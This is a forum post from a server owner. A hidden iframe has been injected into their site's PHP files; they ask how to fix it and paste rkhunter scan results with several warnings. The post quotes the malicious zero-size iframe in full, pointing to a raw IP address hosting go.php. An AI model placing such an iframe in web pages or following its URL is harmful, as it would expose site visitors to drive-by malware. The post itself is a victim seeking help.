I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account. Code: <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> what is the reason and how to fix that ? and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem : rkhunter results: Code: Checking system commands... Performing 'strings' command checks Checking 'strings' command [ OK ] Performing 'shared libraries' checks Checking for preloading variables [ None found ] Checking for preload file [ Not found ] Checking LD_LIBRARY_PATH variable [ Not found ] Performing file properties checks [COLOR=Red][B] Checking for prerequisites [ Warning ][/B][/COLOR] ..... /usr/bin/awk [ OK ] /usr/bin/chattr [ OK ] /usr/bin/curl [ OK ] /usr/bin/cut [ OK ] /usr/bin/diff [ OK ] /usr/bin/dirname [ OK ] /usr/bin/du [ OK ] /usr/bin/env [ OK ] /usr/bin/file [ OK ] /usr/bin/find [ OK ] [B][COLOR=Red] /usr/bin/GET [ Warning ] /usr/bin/groups [ Warning ][/COLOR][/B] /usr/bin/head [ OK ] /usr/bin/id [ OK ] /usr/bin/kill [ OK ] /usr/bin/killall [ OK ] /usr/bin/last [ OK ] /usr/bin/lastlog [ OK ] [B][COLOR=Red] /usr/bin/ldd [ Warning ][/COLOR][/B] /usr/bin/less [ OK ] /usr/bin/locate [ OK ] /usr/bin/logger [ OK ] /usr/bin/w [ OK ] /usr/bin/watch [ OK ] /usr/bin/wc [ OK ] /usr/bin/wget [ OK ] [B][COLOR=Red] /usr/bin/whatis [ Warning ][/COLOR][/B] /usr/bin/whereis [ OK ] /usr/bin/which [ OK ] /usr/bin/who [ OK ] /usr/bin/whoami [ OK ] /usr/bin/gawk [ OK ] /sbin/chkconfig [ OK ] /sbin/depmod [ OK ] /sbin/ifconfig [ OK ] [COLOR=Red][B] /sbin/ifdown [ Warning ][/B][/COLOR] [B][COLOR=Red] /sbin/ifup [ Warning ][/COLOR][/B] /sbin/init [ OK ] /sbin/insmod [ OK ] /sbin/ip [ OK ] /sbin/lsmod [ OK ] /sbin/modinfo [ OK ] /sbin/modprobe [ OK ] /sbin/nologin [ OK ] /sbin/rmmod [ OK ] /sbin/runlevel [ OK ] /sbin/sulogin [ OK ] /sbin/sysctl [ OK ] /sbin/syslogd [ OK ] /usr/sbin/adduser [ OK ] /usr/sbin/chroot [ OK ] /usr/sbin/groupadd [ OK ] /usr/sbin/groupdel [ OK ] /usr/sbin/groupmod [ OK ] /usr/sbin/usermod [ OK ] /usr/sbin/vipw [ OK ] /usr/sbin/xinetd [ OK ] /usr/local/bin/perl [ OK ] /usr/local/bin/rkhunter [ OK ] Performing additional rootkit checks Suckit Rookit additional checks [ OK ] Checking for possible rootkit files and directories [ None found ] Checking for possible rootkit strings [ None found ] Performing malware checks Checking running processes for suspicious files [ None found ] Checking for login backdoors [ None found ] Checking for suspicious directories [ None found ] Checking for sniffer log files [ None found ] Performing trojan specific checks Checking for enabled xinetd services [ None found ] Checking for Apache backdoor [ Not found ] Performing Linux specific checks Checking kernel module commands [ OK ] Checking kernel module names [ OK ] Checking the network... Performing check for backdoor ports Checking for UDP port 2001 [ Not found ] Checking for TCP port 2006 [ Not found ] Checking for TCP port 2128 [ Not found ] Checking for TCP port 14856 [ Not found ] Checking for TCP port 47107 [ Not found ] Checking for TCP port 60922 [ Not found ] Performing checks on the network interfaces Checking for promiscuous interfaces [ None found ] Checking the local host... Performing system boot checks Checking for local host name [ Found ] Checking for local startup files [ Found ] Checking local startup files for malware [ None found ] Checking system startup files for malware [ None found ] Performing group and account checks Checking for passwd file [ Found ] Checking for root equivalent (UID 0) accounts [ None found ] Checking for passwordless accounts [ None found ] Checking for passwd file changes [ None found ] Checking for group file changes [ None found ] Checking root account shell history files [ OK ] Performing system configuration file checks Checking for SSH configuration file [ Found ] [B][COLOR=Red] Checking if SSH root access is allowed [ Warning ][/COLOR][/B] [COLOR=Red][B] Checking if SSH protocol v1 is allowed [ Warning ][/B][/COLOR] Checking for running syslog daemon [ Found ] Checking for syslog configuration file [ Found ] Checking if syslog remote logging is allowed [ Not allowed ] Performing filesystem checks Checking /dev for suspicious file types [ None found ] Checking for hidden files and directories [ Warning ] Checking application versions... Checking version of Exim MTA [ OK ] [B][COLOR=Red] Checking version of GnuPG [ Warning ][/COLOR][/B] Checking version of Apache [ Skipped ] Checking version of Bind DNS [ OK ] [COLOR=Red][B] Checking version of OpenSSL [ Warning ][/B][/COLOR] Checking version of PHP [ OK ] Checking version of Procmail MTA [ OK ] Checking version of OpenSSH [ OK ] System checks summary ===================== File properties checks... Required commands check failed Files checked: 129 Suspect files: 6 Rootkit checks... Rootkits checked : 114 Possible rootkits: 0 Applications checks... Applications checked: 8 Suspect applications: 2 The system checks took: 3 minutes and 12 seconds All results have been written to the logfile (/var/log/rkhunter.log) One or more warnings have been found while checking the system. Please check the log file (/var/log/rkhunter.log) how can I fix all this problem please ????